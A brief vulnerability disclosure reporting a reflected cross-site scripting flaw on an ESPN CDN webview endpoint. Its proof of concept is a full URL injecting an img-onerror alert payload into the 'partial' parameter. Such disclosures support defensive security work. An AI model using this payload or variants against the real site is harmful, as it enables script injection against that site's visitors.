ESPN's CDN suffers from a cross site scripting vulnerability.
9be24660797a2ad3378aff136f4908999af7c4b7bab45ebf5f069b1ae697cd72
Document Title:
===============
Reflected XSS on ESPN site
PoC:
===============
1) Navigate to the following URL:
http://cdn.espn.com/core/standalone/webview?partial=%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E%2F%2F&appsrc=sc&lang=en®ion=us&platform=ios
2) Note that the form alerts with the payload